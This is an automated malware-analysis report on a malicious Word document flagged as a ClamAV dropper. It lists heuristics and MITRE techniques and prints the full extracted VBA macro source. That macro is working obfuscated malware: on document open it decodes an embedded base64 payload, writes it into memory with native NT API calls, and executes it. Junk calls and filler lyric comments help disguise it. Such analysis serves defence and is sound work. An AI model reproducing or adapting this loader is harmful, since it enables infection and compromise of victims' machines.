MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS and CLAMAV_DETECTION heuristics. The Document_Open macro suggests immediate execution upon opening. While the VBA code is heavily obfuscated and truncated, its structure implies it is designed to download and execute a second-stage payload. The document body's content about a sextant and a saxophone appears to be a lure, unrelated to the malicious functionality.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6296402-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6296402-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim dilettant As Integer -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12912 bytes |
SHA-256: fb7b34c66d3e8f7fd5e4546d6d330ae08a065fc571a43c4d1219f6ae20339ce3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub largemouth()
Dim clinic As Byte
Dim driveler As String
provided.aegis.Value = Day(#12/5/2007#)
jews = "serpentine"
appealable = "cloacina"
mendel = "missionary"
Set gook = provided.aegis.SelectedItem
adonic = 80
cross = 38873
cantharellus = 531946
VBA.Pmt 0, adonic, 20881, 50155, 4
showeryrainy = gook.Name
leiopelmatidae = 91 + 5737
midinette = Right(showeryrainy, leiopelmatidae)
crossbar = nonfissile.canonry(midinette)
calculating = 80
tailwind = 35755
painting = 152414
VBA.Pmt 0, calculating, 38677, 49939, 7
everliving = "denaturalize"
#If Win64 Then
Dim hereditament As Integer
Dim bonasa As LongPtr
Dim firstrate As LongPtr
Dim chordospartium As Long
#Else
Dim involuntary As String
Dim firstrate As Long
Dim outride As String
Dim bonasa As Long
#End If
acidotic = 106 - 106
kneel = "listel"
adultery = "mead"
ivory = 127 - 63 - 72 + 4104
adjunct = 98
childcare = 19982
rentable = 311777
VBA.Pmt 0, adjunct, 30644, 50142, 4
peltandra = "nevis"
mister = "lonas"
seize = "cryptoprocta"
sozzly = 7
gracilariidae = 26281
ransack = 342615
VBA.Pmt 0, sozzly, 26111, 21770, 5
cruzeiro = crossbar
templetonia = forelock
osiris = "extenuated"
bonasa = autoradiograph(cruzeiro)
cytological = "cohering"
#If Win64 Then
Dim pauperis As Variant
Dim candlelighting As LongPtr
Dim via As LongPtr
Dim fever As LongPtr
kneed = 88 + 1224
#Else
Dim candlelighting As Long
entail = 12 + 483
Dim via As Long
Dim fever As Long
kneed = entail + 2657
#End If
Dim convulsions As String
Dim motives As Byte
candlelighting = 100 - 100
firstrate = bonasa + kneed
via = 52 + 127 - 109 + 201457
fever = 3500
foundations = rangoon(via, candlelighting, firstrate, candlelighting, candlelighting, candlelighting, candlelighting)
identified = 46
fugaces = 22614
ceratozamia = 498987
VBA.Pmt 0, identified, 14057, 47560, 4
End Sub
Function autoradiograph(godly)
Dim memoria As String
Dim groschen As Variant
Dim unintelligibly As String
Dim posited As Byte
#If Win64 > 0 Then
Dim surveyintrospection As Integer
Dim mislead As LongPtr
viscaceae = 36 - 28
Dim ouzo As LongPtr
Dim adversative As Long
Dim manes As String
Dim housedog As LongPtr
Dim fawncolored As Integer
#Else
Dim drawstring As Long
Dim mislead As Long
viscaceae = 51 + 22 + 120 - 189
Dim ouzo As Long
Dim dairying As String
Dim housedog As Long
Dim cerecloth As Integer
Dim samba As String
#End If
goniometer = VarPtr(mislead)
ashen = cornhusker(goniometer, VarPtr(godly) + 8, viscaceae)
nomia = -1
ouzo = 0
aegina = 0
housedog = 9541
cruel = 4096
collate = 64
fuzzy = princeofwalesheath(ByVal nomia, ouzo, ByVal aegina, housedog, ByVal cruel, ByVal collate)
buccaneering = belching
presentably = boehme * 2
cornhusker ouzo, mislead, 4370
bunchberry = 2
dissatisfaction = 29564
mesmer = 405420
VBA.Pmt 0, bunchberry, 13746, 31951, 2
autoradiograph = ouzo
End Function
Private Sub Document_Open()
Dim dilettant As Integer
Dim geebung As Integer
transitorily = "madcap"
largemouth
delightful = 59
divinity = 33340
relapse = 440714
VBA.Pmt 0, delightful, 31528, 16959, 6
End Sub
Sub IterateOpenForms()
Dim frm As Form
For Each frm In Forms
'Print the name of the referenced form to the Immediate window
Debug.Print frm.Name
Next frm
End Sub
Function cornhusker(reincarnate, atrocious, duress)
#If Win64 Then
Dim odylic As Variant
Dim arachis As Variant
Dim irreligiousness As LongPtr
Dim arthrogram As LongPtr
Dim convulsively As LongPtr
Dim amyotrophia As Integer
Dim anhedonia As LongPtr
Dim periclase As LongPtr
#Else
Dim arthrogram As Long
Dim everest As Variant
Dim irreligiousness As Long
Dim morosoph As Integer
Dim anhedonia As Long
Dim kaiser As Variant
Dim convulsively As Long
Dim garnish As Byte
Dim periclase As Long
Dim confuted As Long
Dim cantharides As Variant
#End If
presentably = presentably * 4
boehme = Rnd(201)
arthrogram = reincarnate
periclase = duress
boehme = presentably - 83
anhedonia = atrocious
sabreur = 7
ptyas = 27698
sonchus = 300027
VBA.Pmt 0, sabreur, 4365, 18905, 3
boehme = boehme - 199
irreligiousness = 25 + 25 - 51
ablepharia ByVal irreligiousness, arthrogram, anhedonia, periclase, convulsively
buccaneering = "emptying"
End Function
Attribute VB_Name = "nonfissile"
' That vanish into the black sun
' Trying to breathe but there's no air
#If 2 = 2 And Win64 > 0 Then
' Trying to breathe but there's no air
' My heart is bleeding why am I here
Public Declare PtrSafe Function rangoon Lib "Kernel32" Alias "CreateTimerQueueTimer" (greene As Any, ByVal measurable As Any, ByVal painter As Any, ByVal synchronous As Any, ByVal cryesthesia As Any, ByVal celtic As Any, ByVal saccharine As Any) As Long
' Taste the last drops of life
' I feel the end is closing in
Public Declare PtrSafe Function pianino Lib "Kernel32.dll" Alias "CreateEventW" (ByVal medial As LongPtr,charlotte As LongPtr,ptisan As LongPtr,astrakhan As LongPtr,mudbeplastered As LongPtr) As Long
' Visions of happiness are burning
' Life doesn't work out as planned
Public Declare PtrSafe Function coil Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (amethystine As LongPtr, contain As Any,cycad As LongPtr, appalachians As Any) As Boolean
' Try to breathe but there's no air
' To dwell in nothing and forever disappear
Public Declare PtrSafe Function ablepharia Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal dostoevski As Any, ByVal ingrowth As Any, ByVal ditch As Any, ByVal limitation As Any, ByVal disputation As Any) As LongPtr
' My heart is bleeding why am I here
' Try to breathe but there's no air
Public Declare PtrSafe Function ammeter Lib "ntdll.dll" Alias "NtContinue" (methaqualone As LongPtr,burin As LongPtr,catastrophic As LongPtr) As LongPtr
' Visions of happiness are burning
' To dwell in nothing and forever disappear
Public Declare PtrSafe Function peptizing Lib "ntdll.dll" Alias "NtDeleteAtom" (carbonated As LongPtr)
' My heart is bleeding why am I here
' Of sorrow slowly killing me
Public Declare PtrSafe Function selfexplanatory Lib "Shlwapi.dll" Alias "PathFileExists" (edging As LongPtr) As LongPtr
' Taste the last drops of life
' That vanish into the black sun
Public Declare PtrSafe Function princeofwalesheath Lib "ntdll.dll " Alias "NtAllocateVirtualMemory" (geant As LongPtr, neve As LongPtr, ByVal shedim As LongPtr,zodiacalByVal As LongPtr, chatoyant As LongPtr, ByVal furnished As LongPtr) As LongPtr
' I feel the end is closing in
' Trying to breathe but there's no air
' Of sorrow slowly killing me
' Dreams that turn into madness
#Else
'
' My heart is bleeding why am I here
Public Declare Function ablepharia Lib "Ntdll.dll " Alias _
"ZwWriteVirtualMemory" (ByVal complicated As Any, ByVal resplendent As Any, ByVal alphabetarian As Any, ByVal lupine As Any, ByVal cebu As Any) As Long
' Dreams that turn into madness
' I feel the end is closing in
Public Declare Function amorpha Lib "Shlwapi.dll" Alias "PathFileExists" (bun As Long) As Long
' Trying to breathe but there's no air
' That vanish into the black sun
Public Declare Function princeofwalesheath Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (foresail As Long, delectus As Long, ByVal hygrophorus As Long, crudeByVal As Long, catapultic As Long, ByVal selfgratification As Long) As Long
' That vanish into the black sun
' I can feel my soul leaving me
Public Declare Function opinionate Lib "ntdll.dll" Alias "NtDeleteAtom" (culture As Long)
' To dwell in nothing and forever disappear
' To dwell in nothing and forever disappear
Public Declare Function homeless Lib "Kernel32.dll" Alias "CreateEventW" (ByVal animate As Long, fendre As Long, bettongia As Long, agar As Long, muscicapa As Long) As Long
' I feel the end is closing in
' That vanish into the black sun
Public Declare Function tantalum Lib "ntdll.dll" Alias "NtContinue" (misunderstood As Long, willingly As Long, cahot As Long) As Long
' I can feel my soul leaving me
' That vanish into the black sun
Public Declare Function milkcap Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (australasia As Long, saurosuchus As Any, carlock As Long, ledger As Any) As Boolean
'
' Taste the last drops of life
Public Declare Function rangoon Lib "Kernel32" Alias "CreateTimerQueueTimer" (exalte As Any, ByVal canaille As Any, ByVal cephalosporin As Any, ByVal pixel As Any, ByVal aethusa As Any, ByVal lex As Any, ByVal analbuminemia As Any) As Long
'
' That vanish into the black sun
' I can feel my soul leaving me
' Try to breathe but there's no air
#End If
' That vanish into the black sun
' Trying to breathe but there's no air
Function canonry(recision) As String
Dim loopline(6962) As Byte
Dim attractive(63) As Long
Dim strephon As String
Dim expedition As String
Dim asportation(63) As Long
presentably = boehme * 2
presentably = Fix(241)
Dim callboard As Long
Dim degustation() As Byte
Dim adelomorphous As String
Dim castrated As Integer
Dim bitis As Long
Dim exanthema As Long
Dim adventurous As Long
Dim biddy As Long
Dim melosa(63) As Long
Dim bravado As Variant
disconnection = buccaneering
Dim bulwer As String
anglais = 258048
Dim cylindric As String
mieux = 19 + 65261
flute = 16711680
himantoglossum = 65536
edentulous = 57 + 198
Dim simulating As Variant
maltster = 64
compt = 126 + 3906
cestrum = 63
meek = 27 + 36 + 193
allars = 262144
cracow = 59 - 75 + 4112
cords = 55 + 73 + 16514944
Dim scyphiform As Byte
drosophila = 0
jealousyjealousness = 17 - 6 - 47 + 5863
Dim ex() As Byte
Dim comitatus As Long
Dim psychically As Byte
ex = StrConv(recision, 128)
Dim arthrography As Variant
azerbaijani = 29
convention = 10431
topsoil = 455591
VBA.Pmt 0, azerbaijani, 38162, 37103, 2
heddle = 5827
nashville = vbKeyShift - 6 - 6
For abut = 0 To heddle
If abut Mod 2 = 0 Then
ex(abut) = ex(abut) - nashville
Else
ex(abut) = ex(abut) - (nashville - 1)
End If
Next abut
crape = 76
bowels = 15929
basilica = 332147
VBA.Pmt 0, crape, 15229, 21664, 3
castrated = 0
anhydride = 0
wrathful = 43
takeup = owner
For biddy = 0 To 63
melosa(biddy) = acold(biddy, maltster, 47)
asportation(biddy) = acold(biddy, cracow, 47)
attractive(biddy) = acold(biddy, allars, 47)
Next biddy
mint = 92
attendant = 20653
tap = 191934
VBA.Pmt 0, mint, 36496, 30552, 2
degustation = ex
voiceless = 4
avails = 41
neolamarkism = 39807
bindery = 113610
VBA.Pmt 0, avails, 21537, 13740, 5
alder = 3
exonerate = buccaneering
boehme = Math.Round(140)
cremona = alder + 1
aerolite = 2
For adventurous = 0 To heddle
plethora = degustation(adventurous)
asynergic = degustation(adventurous + 2)
bitis = attractive(takeup(plethora)) _
+ asportation(takeup(degustation(adventurous + 1))) + melosa(takeup(asynergic)) + takeup(degustation(adventurous + alder))
biddy = acold(bitis, flute, 39)
loopline(exanthema) = acold(biddy, himantoglossum, 29)
biddy = acold(bitis, mieux, 39)
loopline(exanthema + 1) = acold(biddy, meek, 29)
loopline(exanthema + aerolite) = acold(bitis, edentulous, 39)
exanthema = exanthema + aerolite + 1
adventurous = adventurous + 3
Next
canonry = loopline
End Function
Function acold(berber, inherentessential, peindre)
Select Case peindre
Case 29
acold = berber \ inherentessential
Case 39
acold = berber And inherentessential
Case 47
acold = berber * inherentessential
End Select
End Function
Function bridgehead(decide)
bridgehead = AscW(decide)
End Function
Sub headerFooter()
Dim myHeader As headerFooter
Set myHeader = ActiveDocument.Sections(1).Headers _
(wdHeaderFooterPrimary)
End Sub
Function owner()
Dim wrong(255) As Byte
salsify = 55 + 10
Do
wrong(salsify) = salsify - 65
salsify = salsify + 1
Loop Until salsify = 91
salsify = 48
Do
wrong(salsify) = salsify + 4
salsify = salsify + 1
Loop Until salsify = 58
salsify = 97
Do
wrong(salsify) = salsify - 71
salsify = salsify + 1
Loop Until salsify = 123
wrong(47) = 63
salsify = 43
wrong(salsify) = 62
owner = wrong
End Function
Attribute VB_Name = "provided"
Attribute VB_Base = "0{C931FD74-2016-42E2-AB85-393B31E8E8B7}{5B6EFA3F-FE02-4CB4-BFF4-34EC39CE18FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.